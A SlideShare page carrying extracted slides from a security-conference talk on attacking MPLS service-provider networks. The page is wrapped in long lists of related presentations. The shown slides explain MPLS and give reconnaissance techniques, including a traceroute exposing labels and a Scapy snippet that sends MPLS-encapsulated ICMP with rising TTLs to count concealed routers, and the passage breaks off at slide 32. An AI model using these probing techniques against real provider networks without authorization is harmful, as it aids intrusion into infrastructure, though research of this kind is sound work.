Enviar pesquisa
Carregar
Georgi Geshev, warranty void if label removed
•
6 gostaram
•
4,511 visualizações
PacSecJP
Seguir
PacSec2015 speaker
Leia menos
Leia mais
Internet
Denunciar
Compartilhar
Denunciar
Compartilhar
1 de 68
Baixar agora
Baixar para ler offline
Recomendados
[ZeroNights] G. Geshev - Warranty Void If Label Removed: Attacking MPLS Networks
[ZeroNights] G. Geshev - Warranty Void If Label Removed: Attacking MPLS Networks
G. Geshev
Stun turn poc_pilot
Stun turn poc_pilot
Mihály Mészáros
How Secure are IPsec and SSL VPN encryptions
How Secure are IPsec and SSL VPN encryptions
Uday Bhatia
How To Disrupt The Internet of Things With Unified Networking
How To Disrupt The Internet of Things With Unified Networking
Haystack Technologies
LISP_in_Secure_Networks_WP
LISP_in_Secure_Networks_WP
Craig Hill
07 (IDNOG02) SDN Research activity in Institut Teknologi Bandung by Affan Bas...
07 (IDNOG02) SDN Research activity in Institut Teknologi Bandung by Affan Bas...
Indonesia Network Operators Group
Towards the Internet of Relevant Things: the IEEE 802.15.4e Standard
Towards the Internet of Relevant Things: the IEEE 802.15.4e Standard
Giuseppe Anastasi
IPv6 Adressvergabe und Adressierung
IPv6 Adressvergabe und Adressierung
Swiss IPv6 Council
Mais conteúdo relacionado
Mais procurados
DDoS Mitigation using BGP Flowspec
DDoS Mitigation using BGP Flowspec
APNIC
Implementation of isp mpls backbone network on i pv6 using 6 pe routers main PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers main PPT
Satish Kumar
Pro Viva Emmanuel
Pro Viva Emmanuel
Emmanuel Emegha
Applying IPv6 to LTE Networks
Applying IPv6 to LTE Networks
APNIC
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
gogo6
EANTC Test Report: ADVA FSP 150 ProVMe
EANTC Test Report: ADVA FSP 150 ProVMe
ADVA
IoT Gent meetup
IoT Gent meetup
waltercolitti
ICE basic
ICE basic
Vu Nguyen
The Use of IPv6 in IoT
The Use of IPv6 in IoT
Oliver Müller
6TiSCH + RPL @ Telecom Bretagne 2014
6TiSCH + RPL @ Telecom Bretagne 2014
Pascal Thubert
Multicast in OpenStack
Multicast in OpenStack
Vikram G Hosakote
The Role of the Communication Protocols in the IoT: Pitfalls and Advantages
The Role of the Communication Protocols in the IoT: Pitfalls and Advantages
Fabio Gatti
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PROIDEA
Haystack + DASH7 Security
Haystack + DASH7 Security
Haystack Technologies
Summit 16: Open Baton Overview
Summit 16: Open Baton Overview
OPNFV
10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga
10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga
Indonesia Network Operators Group
Why I should Model my Network
Why I should Model my Network
APNIC
Bringing Better Networking to LTE IoT
Bringing Better Networking to LTE IoT
Haystack Technologies
I/O virtualization with InfiniBand and 40 Gigabit Ethernet
I/O virtualization with InfiniBand and 40 Gigabit Ethernet
Mellanox Technologies
Kubernetes OpenContrail Meetup
Kubernetes OpenContrail Meetup
Lachlan Evenson
Mais procurados
(20)
DDoS Mitigation using BGP Flowspec
DDoS Mitigation using BGP Flowspec
Implementation of isp mpls backbone network on i pv6 using 6 pe routers main PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers main PPT
Pro Viva Emmanuel
Pro Viva Emmanuel
Applying IPv6 to LTE Networks
Applying IPv6 to LTE Networks
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
EANTC Test Report: ADVA FSP 150 ProVMe
EANTC Test Report: ADVA FSP 150 ProVMe
IoT Gent meetup
IoT Gent meetup
ICE basic
ICE basic
The Use of IPv6 in IoT
The Use of IPv6 in IoT
6TiSCH + RPL @ Telecom Bretagne 2014
6TiSCH + RPL @ Telecom Bretagne 2014
Multicast in OpenStack
Multicast in OpenStack
The Role of the Communication Protocols in the IoT: Pitfalls and Advantages
The Role of the Communication Protocols in the IoT: Pitfalls and Advantages
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
Haystack + DASH7 Security
Haystack + DASH7 Security
Summit 16: Open Baton Overview
Summit 16: Open Baton Overview
10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga
10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga
Why I should Model my Network
Why I should Model my Network
Bringing Better Networking to LTE IoT
Bringing Better Networking to LTE IoT
I/O virtualization with InfiniBand and 40 Gigabit Ethernet
I/O virtualization with InfiniBand and 40 Gigabit Ethernet
Kubernetes OpenContrail Meetup
Kubernetes OpenContrail Meetup
Destaque
Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1
PacSecJP
Andersson hacking ds_mx_with_sdr_pac_sec_2016_japanese
Andersson hacking ds_mx_with_sdr_pac_sec_2016_japanese
PacSecJP
Kochetova+osipv atm how_to_make_the_fraud__final
Kochetova+osipv atm how_to_make_the_fraud__final
PacSecJP
Pac sec2016 flyer_agenda
Pac sec2016 flyer_agenda
PacSecJP
Adam Laurie, Blue Toot -pacsec-2015
Adam Laurie, Blue Toot -pacsec-2015
PacSecJP
Marc schoenefeld grandma‘s old handbag_draft2_ja
Marc schoenefeld grandma‘s old handbag_draft2_ja
PacSecJP
Filippo, Plain simple reality of entropy
Filippo, Plain simple reality of entropy
PacSecJP
Martin UPnP - pacsec -final-ja
Martin UPnP - pacsec -final-ja
PacSecJP
Richard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzing
PacSecJP
Maxim Goncharov, BPHS pac_sec
Maxim Goncharov, BPHS pac_sec
PacSecJP
Mickey threats inside your platform final
Mickey threats inside your platform final
PacSecJP
Andersson hacking ds_mx_with_sdr_pac_sec_2016_english
Andersson hacking ds_mx_with_sdr_pac_sec_2016_english
PacSecJP
Jonathan Andersson, attacking IoT with SDR pacsec 2015 english
Jonathan Andersson, attacking IoT with SDR pacsec 2015 english
PacSecJP
James Forshaw, elevator action
James Forshaw, elevator action
PacSecJP
Richard high performance fuzzing ja
Richard high performance fuzzing ja
PacSecJP
Mickey, threats inside your platform final
Mickey, threats inside your platform final
PacSecJP
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...
PacSecJP
kyoungju_kwak_the_new_wave_of_cyber_terror
kyoungju_kwak_the_new_wave_of_cyber_terror
PacSecJP
Stuart attacking http2 implementations truefinal-jp
Stuart attacking http2 implementations truefinal-jp
PacSecJP
Filippo, plain simple reality of entropy ja
Filippo, plain simple reality of entropy ja
PacSecJP
Destaque
(20)
Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1
Andersson hacking ds_mx_with_sdr_pac_sec_2016_japanese
Andersson hacking ds_mx_with_sdr_pac_sec_2016_japanese
Kochetova+osipv atm how_to_make_the_fraud__final
Kochetova+osipv atm how_to_make_the_fraud__final
Pac sec2016 flyer_agenda
Pac sec2016 flyer_agenda
Adam Laurie, Blue Toot -pacsec-2015
Adam Laurie, Blue Toot -pacsec-2015
Marc schoenefeld grandma‘s old handbag_draft2_ja
Marc schoenefeld grandma‘s old handbag_draft2_ja
Filippo, Plain simple reality of entropy
Filippo, Plain simple reality of entropy
Martin UPnP - pacsec -final-ja
Martin UPnP - pacsec -final-ja
Richard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzing
Maxim Goncharov, BPHS pac_sec
Maxim Goncharov, BPHS pac_sec
Mickey threats inside your platform final
Mickey threats inside your platform final
Andersson hacking ds_mx_with_sdr_pac_sec_2016_english
Andersson hacking ds_mx_with_sdr_pac_sec_2016_english
Jonathan Andersson, attacking IoT with SDR pacsec 2015 english
Jonathan Andersson, attacking IoT with SDR pacsec 2015 english
James Forshaw, elevator action
James Forshaw, elevator action
Richard high performance fuzzing ja
Richard high performance fuzzing ja
Mickey, threats inside your platform final
Mickey, threats inside your platform final
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...
kyoungju_kwak_the_new_wave_of_cyber_terror
kyoungju_kwak_the_new_wave_of_cyber_terror
Stuart attacking http2 implementations truefinal-jp
Stuart attacking http2 implementations truefinal-jp
Filippo, plain simple reality of entropy ja
Filippo, plain simple reality of entropy ja
Semelhante a Georgi Geshev, warranty void if label removed
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
Ameen Wayok
Rohit profile
Rohit profile
Rohitendu Mishra
2018 FRSecure CISSP Mentor Program- Session 7
2018 FRSecure CISSP Mentor Program- Session 7
FRSecure
Mazharul Islam Khan (063457056)
Mazharul Islam Khan (063457056)
mashiur
MPLS (Multi-Protocol Label Switching)
MPLS (Multi-Protocol Label Switching)
NetProtocol Xpert
Tom Spence_01_22_2015_Resume
Tom Spence_01_22_2015_Resume
Tom Spence
Implementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPT
Satish Kumar
01 introduction to mpls
01 introduction to mpls
Achmad Mardiansyah
Rohit_resume
Rohit_resume
Rohitendu Mishra
СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...
СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...
UA DevOps Conference
ECI UTC Webinar MPLS-TP Value for Utilities-dec 2015
ECI UTC Webinar MPLS-TP Value for Utilities-dec 2015
ECI – THE ELASTIC NETWORK™
Mplsvpn seminar
Mplsvpn seminar
HARRY CHAN PUTRA
Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...
Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...
Positive Hack Days
Himani_Yadav
Himani_Yadav
Himani Yadav
Ethernet basics
Ethernet basics
erick4chitsime
Phifer 3 30_04
Phifer 3 30_04
Ayano Midakso
Mpls
Mpls
arbhatawdekar
Access Network Evolution
Access Network Evolution
Cisco Canada
ContainerDays Hamburg 2023 — Cilium Workshop.pdf
ContainerDays Hamburg 2023 — Cilium Workshop.pdf
Raphaël PINSON
Hong kongopenstack2013 sdn_bluehost
Hong kongopenstack2013 sdn_bluehost
Jun Park
Semelhante a Georgi Geshev, warranty void if label removed
(20)
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
Rohit profile
Rohit profile
2018 FRSecure CISSP Mentor Program- Session 7
2018 FRSecure CISSP Mentor Program- Session 7
Mazharul Islam Khan (063457056)
Mazharul Islam Khan (063457056)
MPLS (Multi-Protocol Label Switching)
MPLS (Multi-Protocol Label Switching)
Tom Spence_01_22_2015_Resume
Tom Spence_01_22_2015_Resume
Implementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPT
01 introduction to mpls
01 introduction to mpls
Rohit_resume
Rohit_resume
СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...
СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...
ECI UTC Webinar MPLS-TP Value for Utilities-dec 2015
ECI UTC Webinar MPLS-TP Value for Utilities-dec 2015
Mplsvpn seminar
Mplsvpn seminar
Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...
Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...
Himani_Yadav
Himani_Yadav
Ethernet basics
Ethernet basics
Phifer 3 30_04
Phifer 3 30_04
Mpls
Mpls
Access Network Evolution
Access Network Evolution
ContainerDays Hamburg 2023 — Cilium Workshop.pdf
ContainerDays Hamburg 2023 — Cilium Workshop.pdf
Hong kongopenstack2013 sdn_bluehost
Hong kongopenstack2013 sdn_bluehost
Mais de PacSecJP
Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-final
PacSecJP
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
PacSecJP
Ryder robertson pac-sec skeleton 2017_jp
Ryder robertson pac-sec skeleton 2017_jp
PacSecJP
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
PacSecJP
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
PacSecJP
Rouault imbert view_alpc_rpc_pacsec_jp
Rouault imbert view_alpc_rpc_pacsec_jp
PacSecJP
Rouault imbert alpc_rpc_pacsec
Rouault imbert alpc_rpc_pacsec
PacSecJP
Di shen pacsec_jp-final
Di shen pacsec_jp-final
PacSecJP
Di shen pacsec_final
Di shen pacsec_final
PacSecJP
Anıl kurmuş pacsec3-ja
Anıl kurmuş pacsec3-ja
PacSecJP
Anıl kurmuş pacsec3
Anıl kurmuş pacsec3
PacSecJP
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
PacSecJP
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
PacSecJP
Yunusov babin 7sins-pres_atm_v4(2)_jp
Yunusov babin 7sins-pres_atm_v4(2)_jp
PacSecJP
Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2
PacSecJP
Shusei tomonaga pac_sec_20171026_jp
Shusei tomonaga pac_sec_20171026_jp
PacSecJP
Shusei tomonaga pac_sec_20171026
Shusei tomonaga pac_sec_20171026
PacSecJP
Kavya racharla ndh-naropanth_fin
Kavya racharla ndh-naropanth_fin
PacSecJP
Lucas apa pacsec_slides_jp-final
Lucas apa pacsec_slides_jp-final
PacSecJP
Lucas apa pacsec slides
Lucas apa pacsec slides
PacSecJP
Mais de PacSecJP
(20)
Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-final
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson pac-sec skeleton 2017_jp
Ryder robertson pac-sec skeleton 2017_jp
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
Rouault imbert view_alpc_rpc_pacsec_jp
Rouault imbert view_alpc_rpc_pacsec_jp
Rouault imbert alpc_rpc_pacsec
Rouault imbert alpc_rpc_pacsec
Di shen pacsec_jp-final
Di shen pacsec_jp-final
Di shen pacsec_final
Di shen pacsec_final
Anıl kurmuş pacsec3-ja
Anıl kurmuş pacsec3-ja
Anıl kurmuş pacsec3
Anıl kurmuş pacsec3
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Yunusov babin 7sins-pres_atm_v4(2)_jp
Yunusov babin 7sins-pres_atm_v4(2)_jp
Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2
Shusei tomonaga pac_sec_20171026_jp
Shusei tomonaga pac_sec_20171026_jp
Shusei tomonaga pac_sec_20171026
Shusei tomonaga pac_sec_20171026
Kavya racharla ndh-naropanth_fin
Kavya racharla ndh-naropanth_fin
Lucas apa pacsec_slides_jp-final
Lucas apa pacsec_slides_jp-final
Lucas apa pacsec slides
Lucas apa pacsec slides
Último
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
ICT Watch - Indonesia
2024_hackersuli_mobil_ios_android ______
2024_hackersuli_mobil_ios_android ______
hackersuli
Annex K RBF's World Game Signals & Telemetry pdf
Annex K RBF's World Game Signals & Telemetry pdf
Steven McGee
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
ICT Watch - Indonesia
The Reasons IV Cannulas Are Important in Modern Healthcare
The Reasons IV Cannulas Are Important in Modern Healthcare
Nanchang Kindly Meditech
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
APNIC
Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...
Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...
Andreas Sfakianakis
Tari Eason Warriors Come Out To Play T Shirts
Tari Eason Warriors Come Out To Play T Shirts
rahman018755
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
vmzoxnx5
Power of Social Media for E-commerce.pdf
Power of Social Media for E-commerce.pdf
rajats19920
HOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYA
HOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYA
Hotbet4d Slot
Último
(11)
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
2024_hackersuli_mobil_ios_android ______
2024_hackersuli_mobil_ios_android ______
Annex K RBF's World Game Signals & Telemetry pdf
Annex K RBF's World Game Signals & Telemetry pdf
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
The Reasons IV Cannulas Are Important in Modern Healthcare
The Reasons IV Cannulas Are Important in Modern Healthcare
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...
Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...
Tari Eason Warriors Come Out To Play T Shirts
Tari Eason Warriors Come Out To Play T Shirts
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
Power of Social Media for E-commerce.pdf
Power of Social Media for E-commerce.pdf
HOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYA
HOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYA
Georgi Geshev, warranty void if label removed
1.
Labs.mwrinfosecurity.com | ©
MWR Labs 1 Labs.mwrinfosecurity.com | © MWR Labs Warranty Void If Label Removed: Attacking MPLS Networks Tokyo, Japan G. Geshev
2.
Labs.mwrinfosecurity.com | ©
MWR Labs 4 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
3.
Labs.mwrinfosecurity.com | ©
MWR Labs 5 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
4.
Labs.mwrinfosecurity.com | ©
MWR Labs 6 MPLS Technology What is MPLS? • Service Provider Networks • Multiprotocol Label Switching Architecture [RFC-3031] • IP Address (L3) vs. Label (L2) Lookups • Single Longest Prefix Match • Label Information Base (LIB) • Virtual Private Networks • MPLS L3VPN • MPLS L2VPN / Virtual Private LAN Services (VPLS)
5.
Labs.mwrinfosecurity.com | ©
MWR Labs 7 MPLS Terms What do we need to know? • Labels • Push, Pop, and Swap Operations • Reserved Labels • Label-Switching Router (LSR) • Provider Router (P) • Label Edge Router (LER) • Provider Edge Router (PE) • Label Switched Path (LSP) • Customer Edge Router (CE)
6.
Labs.mwrinfosecurity.com | ©
MWR Labs 8 MPLS Terms What do we need to know? • Virtual Routing and Forwarding (VRF) • Allows multiple instances of a routing table to exist and operate simultaneously on the same physical device. • VRF Layer 3 segmentation is analogous to VLAN Layer 2 segmentation. • VRFs are only locally significant to the router.
7.
Labs.mwrinfosecurity.com | ©
MWR Labs 10 MPLS Topology Customer Site A Customer Site B Service Provider Network
8.
Labs.mwrinfosecurity.com | ©
MWR Labs 11 MPLS Encapsulation How is traffic handled at the ingress edge? • Label Information Base (LIB) Lookup • MPLS Encapsulation • MPLS Header (Layer 2.5) • Label Stack
9.
Labs.mwrinfosecurity.com | ©
MWR Labs 12 MPLS Encapsulation MPLS Header • Layer 2.5
10.
Labs.mwrinfosecurity.com | ©
MWR Labs 13 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
11.
Labs.mwrinfosecurity.com | ©
MWR Labs 14 Retrospection • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015
12.
Labs.mwrinfosecurity.com | ©
MWR Labs 15 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
13.
Labs.mwrinfosecurity.com | ©
MWR Labs 16 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
14.
Labs.mwrinfosecurity.com | ©
MWR Labs 17 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
15.
Labs.mwrinfosecurity.com | ©
MWR Labs 18 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
16.
Labs.mwrinfosecurity.com | ©
MWR Labs 19 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
17.
Labs.mwrinfosecurity.com | ©
MWR Labs 20 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
18.
Labs.mwrinfosecurity.com | ©
MWR Labs 21 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
19.
Labs.mwrinfosecurity.com | ©
MWR Labs 22 MPLS Network Reconnaissance Basic PE Reconnaissance • MAC Address • Management Protocols • LLDP, CDP, MNDP • Routing Protocols • OSPF, IS-IS, etc. • Services • Telnet, SSH, HTTP, SNMP, etc.
20.
Labs.mwrinfosecurity.com | ©
MWR Labs 23 MPLS Network Reconnaissance Concealed Devices and Links • Analysis of the Security of BGP/MPLS IP Virtual Private Networks [RFC-4381] Service providers and end-customers do not normally want their network topology revealed to the outside. […] If an attacker doesn't know the address of a victim, he can only guess the IP addresses to attack.
21.
Labs.mwrinfosecurity.com | ©
MWR Labs 24 MPLS Network Reconnaissance Concealed Devices and Links • Analysis of the Security of BGP/MPLS IP Virtual Private Networks [RFC-4381] This makes it very hard to attack the core, although some functionality such as pinging core routers will be lost. Traceroute across the core will still work, since it addresses a destination outside the core.
22.
Labs.mwrinfosecurity.com | ©
MWR Labs 25 MPLS Network Reconnaissance Concealed Devices and Links • Analysis of the Security of BGP/MPLS IP Virtual Private Networks [RFC-4381] It has to be mentioned specifically that information hiding as such does not provide security. However, in the market this is a perceived requirement.
23.
Labs.mwrinfosecurity.com | ©
MWR Labs 26 MPLS Network Reconnaissance Concealed Devices and Links • IP TTL Propagation • PE devices decrement the TTL from the IP header and copy the value into the MPLS header. • Propagating the TTL value is enabled by default for a large number of vendors. • ICMP Tunnelling • If an ICMP message is generated by an LSR, the ICMP message is carried all the way to the end of the LSP before it is routed back.
24.
Labs.mwrinfosecurity.com | ©
MWR Labs 27 MPLS Network Reconnaissance Service Provider NetworkClient Site A Client Site B Sample Topology* • Basic Service Provider Network • One Provider (P) and two Provider Edge (PE) devices. • Customer Network • Customer Edge (CE) device at each site. 192.168.100.2/30 192.168.101.2/30
25.
Labs.mwrinfosecurity.com | ©
MWR Labs 28 MPLS Network Reconnaissance Service Provider NetworkClient Site A Client Site B 192.168.100.2/30 192.168.101.2/30 root@R1:~# traceroute -n -e 192.168.101.2 traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60 byte packets 1 192.168.100.1 51.647 ms 61.218 ms 71.238 ms 2 172.16.0.1 <MPLS:L=16,E=0,S=0,T=1/L=19,E=0,S=1,T=1> 81.074 ms 91.056 ms 101.060 ms 3 172.16.0.6 <MPLS:L=19,E=0,S=1,T=1> 121.041 ms 131.009 ms 140.959 ms 4 192.168.101.2 161.038 ms 170.997 ms 180.984 ms root@R1:~# R1
26.
Labs.mwrinfosecurity.com | ©
MWR Labs 29 MPLS Network Reconnaissance Service Provider NetworkClient Site A Client Site B 192.168.100.2/30 192.168.101.2/30 root@R1:~# traceroute -n -e 192.168.101.2 traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60 byte packets 1 192.168.100.1 51.647 ms 61.218 ms 71.238 ms 2 172.16.0.1 <MPLS:L=16,E=0,S=0,T=1/L=19,E=0,S=1,T=1> 81.074 ms 91.056 ms 101.060 ms 3 172.16.0.6 <MPLS:L=19,E=0,S=1,T=1> 121.041 ms 131.009 ms 140.959 ms 4 192.168.101.2 161.038 ms 170.997 ms 180.984 ms root@R1:~# R1
27.
Labs.mwrinfosecurity.com | ©
MWR Labs 30 MPLS Network Reconnaissance Service Provider NetworkClient Site A Client Site B 192.168.100.2/30 192.168.101.2/30 root@R1:~# traceroute -n -e 192.168.101.2 traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60 byte packets 1 192.168.100.1 51.647 ms 61.218 ms 71.238 ms 2 172.16.0.1 <MPLS:L=16,E=0,S=0,T=1/L=19,E=0,S=1,T=1> 81.074 ms 91.056 ms 101.060 ms 3 172.16.0.6 <MPLS:L=19,E=0,S=1,T=1> 121.041 ms 131.009 ms 140.959 ms 4 192.168.101.2 161.038 ms 170.997 ms 180.984 ms root@R1:~# R1
28.
Labs.mwrinfosecurity.com | ©
MWR Labs 31 MPLS Network Reconnaissance In a nutshell… Let us consider a scenario with IP TTL Propagation and ICMP Tunnelling disabled as per best practices.
29.
Labs.mwrinfosecurity.com | ©
MWR Labs 32 MPLS Network Reconnaissance In a nutshell… Let us consider a scenario with IP TTL Propagation and ICMP Tunnelling disabled as per best practices.
30.
Labs.mwrinfosecurity.com | ©
MWR Labs 33 MPLS Network Reconnaissance How many LSRs are there? • Basic enumeration trick reveals the number of intermediate service provider devices along the LSP. • Generate a series of ICMP echo requests encapsulated in MPLS with sequentially incrementing TTL values. • Label values may vary within the reserved range. • Prerequisite is for a PE to process MPLS encapsulated traffic received on a customer interface.
31.
Labs.mwrinfosecurity.com | ©
MWR Labs 34 MPLS Network Reconnaissance Service Provider NetworkClient Site A Client Site B 192.168.100.2/30 192.168.101.2/30 >>> load_contrib('mpls') >>> a = Ether(src = '08:00:27:12:27:13', dst = ‘XX:XX:XX:a3:7b:01') >>> b = MPLS(label = 0, ttl = range(0, 4)) >>> c = IP(src = '192.168.100.2', dst = '192.168.101.2') >>> d = ICMP() >>> sendp(a/b/c/d) ... Sent 4 packets. >>> R1
32.
Labs.mwrinfosecurity.com | ©
